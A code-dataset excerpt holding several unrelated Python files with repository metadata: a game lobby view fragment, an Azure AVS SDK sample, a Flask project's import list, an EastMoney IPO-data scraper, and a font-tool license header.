g_prbLoader.setEnabled(True)
self.addListener(events.LobbySimpleEvent.SHOW_HELPLAYOUT, self.__showHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.addListener(events.LobbySimpleEvent.CLOSE_HELPLAYOUT, self.__closeHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.addListener(events.GameEvent.SCREEN_SHOT_MADE, self.__handleScreenShotMade, EVENT_BUS_SCOPE.GLOBAL)
g_playerEvents.onVehicleBecomeElite += self.__onVehicleBecomeElite
self.app.loaderManager.onViewLoadInit += self.__onViewLoadInit
self.app.loaderManager.onViewLoaded += self.__onViewLoaded
self.app.loaderManager.onViewLoadError += self.__onViewLoadError
game_control.g_instance.igr.onIgrTypeChanged += self.__onIgrTypeChanged
self.__showBattleResults()
battlesCount = g_itemsCache.items.getAccountDossier().getTotalStats().getBattlesCount()
g_lobbyContext.updateBattlesCount(battlesCount)
self.fireEvent(events.GUICommonEvent(events.GUICommonEvent.LOBBY_VIEW_LOADED))
keyCode = CommandMapping.g_instance.get('CMD_VOICECHAT_MUTE')
if not BigWorld.isKeyDown(keyCode):
VOIP.getVOIPManager().setMicMute(True)
def _dispose(self):
game_control.g_instance.igr.onIgrTypeChanged -= self.__onIgrTypeChanged
self.app.loaderManager.onViewLoadError -= self.__onViewLoadError
self.app.loaderManager.onViewLoaded -= self.__onViewLoaded
self.app.loaderManager.onViewLoadInit -= self.__onViewLoadInit
g_playerEvents.onVehicleBecomeElite -= self.__onVehicleBecomeElite
self.removeListener(events.LobbySimpleEvent.SHOW_HELPLAYOUT, self.__showHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.removeListener(events.LobbySimpleEvent.CLOSE_HELPLAYOUT, self.__closeHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.removeListener(events.GameEvent.SCREEN_SHOT_MADE, self.__handleScreenShotMade, EVENT_BUS_SCOPE.GLOBAL)
View._dispose(self)
def __showHelpLayout(self, _):
self.as_showHelpLayoutS()
def __closeHelpLayout(self, _):
self.as_closeHelpLayoutS()
def __handleScreenShotMade(self, event):
if 'path' not in event.ctx:
return
SystemMessages.pushMessage(i18n.makeString('#menu:screenshot/save') % {'path': event.ctx['path']}, SystemMessages.SM_TYPE.Information)
def __onVehicleBecomeElite(self, vehTypeCompDescr):
self.fireEvent(events.LoadViewEvent(VIEW_ALIAS.ELITE_WINDOW, getViewName(VIEW_ALIAS.ELITE_WINDOW, vehTypeCompDescr), {'vehTypeCompDescr': vehTypeCompDescr}), EVENT_BUS_SCOPE.LOBBY)
def moveSpace(self, dx, dy, dz):
if g_hangarSpace.space:
g_hangarSpace.space.handleMouseEvent(int(dx), int(dy), int(dz))
def notifyCursorOver3dScene(self, isOver3dScene):
self.fireEvent(events.LobbySimpleEvent(events.LobbySimpleEvent.NOTIFY_CURSOR_OVER_3DSCENE, ctx={'isOver3dScene': isOver3dScene}))
def __onViewLoadInit(self, view):
if view is not None and view.settings is not None:
self.__subViewTransferStart(view.settings.alias)
return
def __onViewLoaded(self, view):
    """Hide the loading overlay once a tracked sub-view has finished loading."""
    if view is None or view.settings is None:
        return
    self.__subViewTransferStop(view.settings.alias)
def __onViewLoadError(self, name, msg, item):
    """Hide the loading overlay for a sub-view whose loading failed."""
    if item is None or item.pyEntity is None:
        return
    self.__subViewTransferStop(item.pyEntity.settings.alias)
def __onIgrTypeChanged(self, roomType, xpFactor):
    """Notify the player when premium IGR customization becomes available or ends.

    A message is pushed on the transition into PREMIUM, and on the transition
    out of PREMIUM into BASE/NONE; the last seen room type is remembered.
    """
    igrIcon = gui.makeHtmlString('html_templates:igr/iconSmall', 'premium')
    enteredPremium = roomType == constants.IGR_TYPE.PREMIUM
    leftPremium = (self.__currIgrType == constants.IGR_TYPE.PREMIUM
                   and roomType in (constants.IGR_TYPE.BASE, constants.IGR_TYPE.NONE))
    if enteredPremium:
        SystemMessages.pushMessage(i18n.makeString(SYSTEM_MESSAGES.IGR_CUSTOMIZATION_BEGIN, igrIcon=igrIcon), type=SystemMessages.SM_TYPE.Information)
    elif leftPremium:
        SystemMessages.pushMessage(i18n.makeString(SYSTEM_MESSAGES.IGR_CUSTOMIZATION_END, igrIcon=igrIcon), type=SystemMessages.SM_TYPE.Information)
    self.__currIgrType = roomType
def __subViewTransferStart(self, alias):
    """Show the 'loadPage' wait spinner for sub-views listed in VIEW_WAITING."""
    if alias in self.VIEW_WAITING:
        Waiting.show('loadPage')
def __subViewTransferStop(self, alias):
    """Hide the 'loadPage' wait spinner for tracked sub-views.

    BATTLE_LOADING is excluded: its spinner is dismissed elsewhere.
    """
    if alias != VIEW_ALIAS.BATTLE_LOADING and alias in self.VIEW_WAITING:
        Waiting.hide('loadPage')
def __showBattleResults(self):
    """Open the battle-results window for the most recent arena, if any.

    The stored arena id is cleared afterwards so the window opens only once.
    """
    battleCtx = g_sessionProvider.getCtx()
    arenaID = battleCtx.lastArenaUniqueID
    if arenaID:
        shared_events.showMyBattleResults(arenaID)
        battleCtx.lastArenaUniqueID = None
| [
"[email protected]"
] | |
11dfb9beb211a5842f05475135524472e63b0052 | 9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb | /sdk/compute/azure-mgmt-avs/generated_samples/workload_networks_get.py | 60db6d3b5326e38bb0efaea0f5d34f54b45f667d | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | openapi-env-test/azure-sdk-for-python | b334a2b65eeabcf9b7673879a621abb9be43b0f6 | f61090e96094cfd4f43650be1a53425736bd8985 | refs/heads/main | 2023-08-30T14:22:14.300080 | 2023-06-08T02:53:04 | 2023-06-08T02:53:04 | 222,384,897 | 1 | 0 | MIT | 2023-09-08T08:38:48 | 2019-11-18T07:09:24 | Python | UTF-8 | Python | false | false | 1,556 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.avs import AVSClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-avs
# USAGE
python workload_networks_get.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Fetch and print the default workload network of a sample private cloud."""
    credential = DefaultAzureCredential()
    avs_client = AVSClient(
        credential=credential,
        subscription_id="00000000-0000-0000-0000-000000000000",
    )
    workload_network = avs_client.workload_networks.get(
        resource_group_name="group1",
        private_cloud_name="cloud1",
        workload_network_name="default",
    )
    print(workload_network)
# x-ms-original-file: specification/vmware/resource-manager/Microsoft.AVS/stable/2022-05-01/examples/WorkloadNetworks_Get.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
aed27d9f42e5ddf4ac6f352e7d7d2b88f8f3a672 | 4eb3ff3e56043bc20162a59039af37533432feb1 | /项目所用模块.py | 1205da794e0b83ed65e541fe40c0fafae5ead37b | [] | no_license | luofang0212/flask_test | 99787a43ba117b0e5684f811ad9f83442c6e95cb | e9ea8644f7bbae94c0b689b79235913f73da7124 | refs/heads/master | 2023-07-26T00:49:53.681815 | 2021-09-06T16:15:11 | 2021-09-06T16:15:11 | 403,010,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 本项目所用到的模块
''''''
'''
python 自带包
'''
'''
python 第三方库
'''
from flask import Flask
from flask import render_template
from flask import request
import jieba # 分词
from matplotlib import pyplot as plt #绘图,数据可视化
from PIL import Image #图片处理
import numpy as np #矩阵运算
import pymysql # mysql 数据库驱动
from wordcloud import WordCloud #词云
| [
"[email protected]"
] | |
1c84e7fe3a830af4777b1d5b5bd68515f665e933 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210204134044.py | 4c6d13f47417082167dcfd1e70c90cb3da6b4adc | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,693 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : easy-money.py
@Time : 2021/02/04 09:03:02
@Author : Jiajun Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA
'''
# 东方财富网 首发申报及上会信息
import re
import pickle
from datetime import datetime, timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
import configparser
import os.path
from utils import save_pickle,load_pickle
# config = configparser.ConfigParser()
# config.read('./src/Config.ini')
# # headers = config['eastmoney']['headers']
# base_url = config['eastmoney']['base_url']
# Base endpoint of EastMoney's data-center JSON(P) interface.
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
# Date of the last successful crawl; compared against update_date() to decide
# whether a refresh is needed.
lastDate = '2021-1-21'
# Output CSV / pickle cache locations.
eastmoney_raw_data_path = './data/EastMoney/eastmoney_raw_data.csv'
zzsc_csv_path = './data/EastMoney/eastmoney_zzsc.csv'
zzsc_pkl_path = './saved_config/eastmoney_zzsc.pkl'
szzxb_stocksInfo_path = './saved_config/szzxb_stocksInfo.pkl'
shzb_stocksInfo_path = './saved_config/shzb_stocksInfo.pkl'
zb_zxb_stocksInfo_path = './saved_config/zb_zxb_stocksInfo.pkl'
eastmoney_meeting_path = './data/EastMoney/eastmoney_data_meeting.csv'
# Desktop-browser User-Agent so the endpoint serves the regular payload.
headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def update_date():
    """Return the most recent disclosure date listed on the EastMoney page."""
    response = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
                            headers=headers)
    response.encoding = 'gbk'
    page = BeautifulSoup(response.text, 'html.parser')
    # The first <option> of the date selector is the newest date.
    return page.find('option').get_text()
def dateList_gen():
    """Return every disclosure date available on the EastMoney page, newest first."""
    response = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
                            headers=headers)
    response.encoding = 'gbk'
    page = BeautifulSoup(response.text, 'html.parser')
    return [option.text for option in page.findAll('option')]
def update_eastmoneyData():
    """Incrementally fetch IPO disclosure data for dates not yet cached on disk.

    On first run the aggregate CSV is created with a header row; afterwards one
    block of rows per newly discovered disclosure date is appended to it (the
    per-date cache file written by get_eastmoneyData marks a date as done).
    """
    import csv  # stdlib; was never imported at module level, so the
                # first-run branch crashed with NameError before this fix

    dataList = dateList_gen()
    if not os.path.isfile('./data/EastMoney/eastmoneyRawData.csv'):
        columns = ['机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
                   '签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接']
        with open('./data/EastMoney/eastmoneyRawData.csv', 'w') as f:
            writer = csv.DictWriter(f, fieldnames=columns)
            writer.writeheader()
    for date in reversed(dataList):
        if not os.path.isfile('./data/EastMoney/首发信息/{}.csv'.format(date)):
            print('find new date:{}, fetching.....'.format(date))
            df = get_eastmoneyData(date)
            df.to_csv('./data/EastMoney/eastmoneyRawData.csv', mode='a',
                      header=False, index=False, encoding='utf-8-sig')
    return
def get_eastmoneyData(date):
    """Fetch the IPO declaration table ('首发申报') for one disclosure *date*.

    Returns a cleaned DataFrame (创业板 rows removed, company names normalised)
    and writes it to the per-date CSV cache as a side effect.
    """
    import ast  # stdlib; used to parse the JSONP payload without eval

    query = {'type': 'NS',
             'sty': 'NSFR',
             'st': '1',
             'sr': '-1',
             'p': '1',
             'ps': '5000',
             'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
             'mkt': '1',
             'fd': date,
             'rt': '53721774'
             }
    rs = requests.get(base_url, params=query, headers=headers)
    js = rs.text.split('var IBhynDx={pages:1,data:')[1]
    # literal_eval instead of eval: the payload comes straight off the network
    # and must not be executed as arbitrary Python.
    data = ast.literal_eval(js[:-1])
    temp = [i.split(',') for i in data]
    columns = [
        '会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
        '是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
    ]
    df = pd.DataFrame(temp, columns=columns)
    df['文件链接'] = df['时间戳'].apply(
        lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
    )
    df = df[[
        '机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
        '签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
    ]]
    df = df[df['板块'] != '创业板']
    # replace() is not in-place; the original discarded these results (no-op).
    df = df.replace({'是否提交财务自查报告': ' '}, '是')
    df = df.replace({'是否提交财务自查报告': '不适用'}, '是')
    df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
    df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
    df.to_csv('C:/Users/chen/Desktop/IPO_info/data/EastMoney/首发信息/{}.csv'.format(date), index=False, encoding='utf-8-sig')
    return df
def update_zzscData():
    """Refresh the terminated-review ('终止审查') dataset and return it as a DataFrame.

    Loads the cached dict (rebuilding it from scratch if the cache is missing
    or unreadable), merges in the newest date's records when the site has a
    newer date than *lastDate*, then always writes the CSV + pickle caches.

    Bug fixed: the original put the DataFrame construction in an ``else``
    branch, so ``zzsc_df`` was undefined whenever ``newDate != lastDate``
    (and ``zzsc_dict`` undefined otherwise) — a guaranteed NameError.
    """
    newDate = update_date()
    try:
        zzsc_dict = load_pickle(zzsc_pkl_path)
    except Exception:
        # No usable cache: rebuild from every available date
        # (gen_zzscDict saves the pickle itself).
        zzsc_dict = gen_zzscDict()
    else:
        if newDate != lastDate:
            for i in get_zzscData(newDate):
                name = i.split(',')[1]
                if name not in zzsc_dict:
                    zzsc_dict[name] = i.split(',')[2]
    zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
    zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\*', '', regex=True)
    zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'股份有限公司', '', regex=True)
    zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\(', '(', regex=True)
    zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\)', ')', regex=True)
    zzsc_df.to_csv(zzsc_csv_path, encoding='utf-8-sig', index=False)
    save_pickle(zzsc_dict, zzsc_pkl_path)
    return zzsc_df
def gen_zzscDict():
    """Build the terminated-review dict from scratch over every available date.

    Maps company name -> termination date (first occurrence wins) and saves
    the result to the pickle cache before returning it.
    """
    zzsc_dict = {}
    for date in dateList_gen():
        for record in get_zzscData(date):
            fields = record.split(',')
            # Keep the first date seen for each company.
            zzsc_dict.setdefault(fields[1], fields[2])
    save_pickle(zzsc_dict, zzsc_pkl_path)
    return zzsc_dict
def get_zzscData(date):
    """Fetch terminated-review ('终止审查') records for one *date*.

    Returns a list of comma-joined record strings, or '' when the endpoint
    reports no data (kept as '' for backward compatibility with callers that
    simply iterate the result).
    """
    import ast  # stdlib; used to parse the JSONP payload without eval

    query = {
        'type': 'NS',
        'sty': 'NSSE',
        'st': '1',
        'sr': '-1',
        'p': '1',
        'ps': '500',
        'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
        'mkt': '4',
        'stat': 'zzsc',
        'fd': date,
        'rt': '53727636'
    }
    url = base_url + urlencode(query)
    rss = requests.get(url, headers=headers)
    if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
        return ''
    jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
    # literal_eval instead of eval: the payload comes from the network.
    return ast.literal_eval(jss[:-1])
def get_meetingData(newDate):
    """Fetch review-meeting ('上会') info for main board (mkt=2) and SME board (mkt=4).

    Re-downloads and rewrites the CSV cache when *newDate* differs from
    *lastDate* or the cache is missing; otherwise returns the cached CSV.
    """
    import ast  # stdlib; used to parse the JSONP payload without eval

    if newDate != lastDate or not os.path.isfile(eastmoney_meeting_path):
        meetingInfo = []
        for marketType in ['2', '4']:  # 2 为主板, 4 为中小板
            query = {
                'type': 'NS',
                'sty': 'NSSH',
                'st': '1',
                'sr': '-1',
                'p': '1',
                'ps': '5000',
                'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
                'mkt': marketType,
                'rt': '53723990'
            }
            url = base_url + urlencode(query)
            rss = requests.get(url, headers=headers)
            jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
            # literal_eval instead of eval: network data must not be executed.
            data = ast.literal_eval(jss[:-1])
            meetingInfo.extend(data)
        temp = [j.split(',') for j in meetingInfo]
        columns = [
            '时间戳', 'yyy', '公司代码', '机构名称', '详情链接', '申报日期', '上会日期', '申购日期', '上市日期',
            '9', '拟发行数量', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '当前状态', '上市地点',
            '主承销商', '承销方式', '发审委委员', '网站', '简称'
        ]
        df = pd.DataFrame(temp, columns=columns)
        df['文件链接'] = df['时间戳'].apply(
            lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
        )
        df['详情链接'] = df['公司代码'].apply(
            lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
        df = df[[
            '机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期', '上会日期', '申购日期', '上市日期',
            '主承销商', '承销方式', '9', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '发审委委员',
            '网站', '公司代码', 'yyy', '时间戳', '简称', '详情链接', '文件链接'
        ]]
        df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
        df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
        df['机构名称'] = df['机构名称'].replace(r'\(', '(', regex=True)
        df['机构名称'] = df['机构名称'].replace(r'\)', ')', regex=True)
        df.to_csv(
            eastmoney_meeting_path,
            index=False,
            encoding='utf-8-sig')
    else:
        df = pd.read_csv(eastmoney_meeting_path, keep_default_na=False)
    return df
def eastmoney_cleanUP():
    """Load the raw EastMoney CSV, normalise it, and deduplicate per status.

    Rows are sorted by (company, sponsor, status, date) with the status column
    as an ordered categorical, then deduplicated keeping the first (earliest)
    row per (company, sponsor, status). Writes the cleaned CSV and returns it.
    """
    east_money = pd.read_csv(eastmoney_raw_data_path, keep_default_na=False)
    # DataFrame.replace is not in-place; the original discarded these two
    # results (silent no-ops) — assign them back.
    east_money = east_money.replace({'是否提交财务自查报告': ' '}, '是')
    east_money = east_money.replace({'是否提交财务自查报告': '不适用'}, '是')
    east_money['机构名称'] = east_money['机构名称'].replace(r'\*', '', regex=True)
    east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司', '', regex=True)
    east_money['机构名称'] = east_money['机构名称'].replace(r'\(', '(', regex=True)
    east_money['机构名称'] = east_money['机构名称'].replace(r'\)', ')', regex=True)
    east_money = east_money[east_money['板块'] != '创业板']
    # Ordered categorical so sort_values ranks statuses by review progress.
    east_money['类型'] = pd.Categorical(east_money['类型'],
                                      categories=["已受理", "已反馈", "预先披露更新", "中止审查", "已提交发审会讨论,暂缓表决",
                                                  "已上发审会,暂缓表决", "已通过发审会"], ordered=True)
    east_money.sort_values(['机构名称', '保荐机构', '类型', '日期'], inplace=True)
    # east_money.to_csv('./pre_cleab.csv',encoding='utf-8-sig',index=False)
    east_money.drop_duplicates(subset=['机构名称', '保荐机构', '类型'],
                               keep='first',
                               inplace=True)
    east_money.to_csv(
        './data/EastMoney/eastmoney_data_cleaned_v2.csv',
        encoding='utf-8-sig',
        index=False)
    return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
    '''Merge the cleaned status rows, meeting info, and terminated-review data
    into one dict keyed by company name, then pickle and return it.

    主板、中小板 = {'机构名称':'',
                '简称':'',
                'Wind代码':'',
                '统一社会信用代码':'',
                '板块':'',
                '注册地':'',
                '所属行业':'',
                '经营范围':'',
                '预先披露':'[日期]',
                '已反馈':'[日期]',
                '预先披露更新':'[日期]',
                '发审会':{'中止审查':'[日期]',
                         '已上发审会,暂缓表决':'[日期]',
                         '已提交发审会讨论,暂缓表决':'[日期]',
                         '已通过发审会':'[日期]'},
                '终止审查':'[日期]',
                '上市日期':'[日期]',
                '保荐机构':'',
                '律师事务所':'',
                '会计师事务所':'',
                '发行信息':{'拟发行数量':'',
                           '发行前总股本':'',
                           '发行后总股本':''},
                '反馈文件':'[链接]'
                }
    '''
    all_data = {}  # 总数据
    ekk = cleaned_easymoney_df.values.tolist()
    for i in ekk:
        # (removed a stray no-op `i` expression statement that was here)
        if i[0] not in all_data:
            all_data[i[0]] = {
                '机构名称': i[0] + '股份有限公司',
                '简称': i[15],
                'Wind代码': '',
                '统一社会信用代码': '',
                '板块': i[2],
                '注册地': '',
                '所属行业': '',
                '经营范围': '',
                '预先披露': '',
                '已反馈': '',
                '预先披露更新': '',
                '发审会': {
                    '中止审查': '',
                    '已上发审会,暂缓表决': '',
                    '已提交发审会讨论,暂缓表决': '',
                    '已通过发审会': ''
                },
                '终止审查': '',
                '上市日期': '',
                '保荐机构': i[4],
                '保荐代表人': '',
                '律师事务所': i[6],
                '签字律师': '',
                '会计师事务所': i[8],
                '签字会计师': '',
                '发行信息': {
                    '拟发行数量(万)': '',
                    '发行前总股本(万)': '',
                    '发行后总股本(万)': ''
                },
                '反馈文件': ''
            }
        if i[1] == '已受理':
            all_data[i[0]]['预先披露'] = i[12]
        elif i[1] == '已反馈':
            all_data[i[0]]['已反馈'] = i[12]
        elif i[1] == '预先披露更新':
            all_data[i[0]]['预先披露更新'] = i[12]
        elif i[1] == '已通过发审会':
            all_data[i[0]]['发审会']['已通过发审会'] = i[12]
        elif i[1] == '已提交发审会讨论,暂缓表决':
            all_data[i[0]]['发审会']['已提交发审会讨论,暂缓表决'] = i[12]
        elif i[1] == '已上发审会,暂缓表决':
            all_data[i[0]]['发审会']['已上发审会,暂缓表决'] = i[12]
        elif i[1] == '中止审查':
            all_data[i[0]]['发审会']['中止审查'] = i[12]
        # Fill descriptive fields only once, from the first row that has them.
        if all_data[i[0]]['注册地'] == '' and i[3] != '':
            all_data[i[0]]['注册地'] = i[3]
        if all_data[i[0]]['所属行业'] == '' and i[11] != '':
            all_data[i[0]]['所属行业'] = i[11]
        if all_data[i[0]]['保荐代表人'] == '' and i[5] != '':
            all_data[i[0]]['保荐代表人'] = i[5]
        if all_data[i[0]]['签字律师'] == '' and i[7] != '':
            all_data[i[0]]['签字律师'] = i[7]
        if all_data[i[0]]['签字会计师'] == '' and i[9] != '':
            all_data[i[0]]['签字会计师'] = i[9]
    # 添加上会信息
    ekk2 = meetingInfo_df.values.tolist()
    error_set = {}
    for i in ekk2:
        i[0] = i[0].replace(r'股份有限公司', '')
        if i[0] not in all_data:
            print("Error: Cannot find ", i[0])
            error_set.update({i[0]: i[5]})
            continue
        if i[1] == '上会未通过':
            all_data[i[0]]['发审会']['上会未通过'] = i[5]
        elif i[1] == '取消审核':
            all_data[i[0]]['发审会']['取消审核'] = i[5]
        elif i[1] == '上会通过':
            all_data[i[0]]['发审会']['已通过发审会'] = i[5]
        if i[7] != '':
            # Bug fix: the original wrote '上市时间', creating a key that the
            # schema (and every reader) calls '上市日期'.
            all_data[i[0]]['上市日期'] = i[7]
        # Bug fix: keys must match the '(万)' keys initialised above; the
        # original created three duplicate keys without the suffix.
        all_data[i[0]]['发行信息']['拟发行数量(万)'] = "{:.2f}".format(int(i[3]) / 10000)
        all_data[i[0]]['发行信息']['发行前总股本(万)'] = "{:.2f}".format(int(i[11]) / 10000)
        all_data[i[0]]['发行信息']['发行后总股本(万)'] = "{:.2f}".format(int(i[12]) / 10000)
    # 添加终止审查信息
    ekk3 = zzsc_df.values.tolist()
    for i in ekk3:
        name = i[0].replace(r'股份有限公司', '')
        if name not in all_data:
            print("Error: Cannot find in zzsc", i[0])
            error_set.update({name: i[1]})
            continue
        all_data[name]['终止审查'] = i[1]
    save_pickle(all_data, zb_zxb_stocksInfo_path)
    return all_data
# def update_all():
# try:
# with open('','rb') as file:
# zb_zxb_dict = pickle.load(file)
# _,temp = update_eastmoneyData()
# for i in temp:
# if i not in zb_zxb_dict:
# pass
# else:
# # columns = [
# # '会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
# # '是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
# # ]
# i[]
def update_stockInfo(df):
    """Merge status rows from *df* into the cached per-stock info dict.

    Meeting-stage statuses go under the nested '发审会' key; the three
    pre-meeting statuses go at the top level. Only empty fields are filled,
    so earlier dates are never overwritten. If the cache is missing, the
    whole dataset is rebuilt instead.
    """
    try:
        allStocksInfo = load_pickle(zb_zxb_stocksInfo_path)
    except Exception:
        east_money_df = eastmoney_cleanUP()
        # Bug fix: get_meetingData requires the latest date argument; the
        # original called it with no arguments (TypeError).
        meetingInfo_df = get_meetingData(update_date())
        zzsc_df = update_zzscData()
        allStocksInfo = gen_finalData(east_money_df, meetingInfo_df, zzsc_df)
    else:
        for index, row in df.iterrows():
            # Bug fix: the original compared a string to a list with `!=`,
            # which is always True; a membership test is what was intended.
            if row['类型'] not in ('已受理', '已反馈', '预先披露更新'):
                if allStocksInfo[row['机构名称']]['发审会'][row['类型']] == '':
                    allStocksInfo[row['机构名称']]['发审会'][row['类型']] = row['日期']
            else:
                if allStocksInfo[row['机构名称']][row['类型']] == '':
                    allStocksInfo[row['机构名称']][row['类型']] = row['日期']
if __name__ == '__main__':
    # The full refresh pipeline below is intentionally disabled; only the
    # clean-up step over the already-downloaded raw CSV runs.
    # newDate = update_date()
    # # update_eastmoneyData(newDate)
    # east_money_df = eastmoney_cleanUP()
    # meetingInfo_df = get_meetingData(newDate)
    # zzsc_df = update_zzscData(newDate)
    # # dateList = date_gen()
    # # get_eastmoneyData(dateList)
    # # east_money_df = eastmoney_cleanUP()
    # # east_money_df = pd.read_csv('./EastMoney/easymoney_data_new.csv',keep_default_na=False)
    # # meetingInfo_df = pd.read_csv('./EastMoney/eastmoney_data_meeting.csv',keep_default_na=False)
    # # meetingInfo_df = get_meetingData()
    # # zzsc_df = pd.read_csv('./EastMoney/zzsc.csv')
    # all_data,_,_ = gen_finalData(east_money_df,meetingInfo_df,zzsc_df)
    # print('Complete!')
    eastmoney_cleanUP()
"[email protected]"
] | |
9f66513cbf1b5dd410e4e8fa89518981ebb1faa4 | 7f2e3f56f0eda8bfa1c55d8d173456fad04a05bd | /app/static/ionicons/builder/scripts/eotlitetool.py | 1643bea1df87fa8c96c85bbdb1d1f941a115e8b7 | [
"MIT"
] | permissive | pipoted/movie | 91e40a3184884dc3e1db61eac7a5d6c7b7cfdb33 | be13cc1845c377dc1145267fbf799c004f170793 | refs/heads/master | 2020-03-28T13:18:06.166066 | 2018-09-11T21:14:48 | 2018-09-11T21:14:48 | 148,381,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,986 | py | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is font utility code.
#
# The Initial Developer of the Original Code is Mozilla Corporation.
# Portions created by the Initial Developer are Copyright (C) 2009
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# John Daggett <[email protected]>
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK ***** */
# eotlitetool.py - create EOT version of OpenType font for use with IE
#
# Usage: eotlitetool.py [-o output-filename] font1 [font2 ...]
#
# OpenType file structure
# http://www.microsoft.com/typography/otspec/otff.htm
#
# Types:
#
# BYTE 8-bit unsigned integer.
# CHAR 8-bit signed integer.
# USHORT 16-bit unsigned integer.
# SHORT 16-bit signed integer.
# ULONG 32-bit unsigned integer.
# Fixed 32-bit signed fixed-point number (16.16)
# LONGDATETIME Date represented in number of seconds since 12:00 midnight, January 1, 1904. The value is represented as a signed 64-bit integer.
#
# SFNT Header
#
# Fixed sfnt version // 0x00010000 for version 1.0.
# USHORT numTables // Number of tables.
# USHORT searchRange // (Maximum power of 2 <= numTables) x 16.
# USHORT entrySelector // Log2(maximum power of 2 <= numTables).
# USHORT rangeShift // NumTables x 16-searchRange.
#
# Table Directory
#
# ULONG tag // 4-byte identifier.
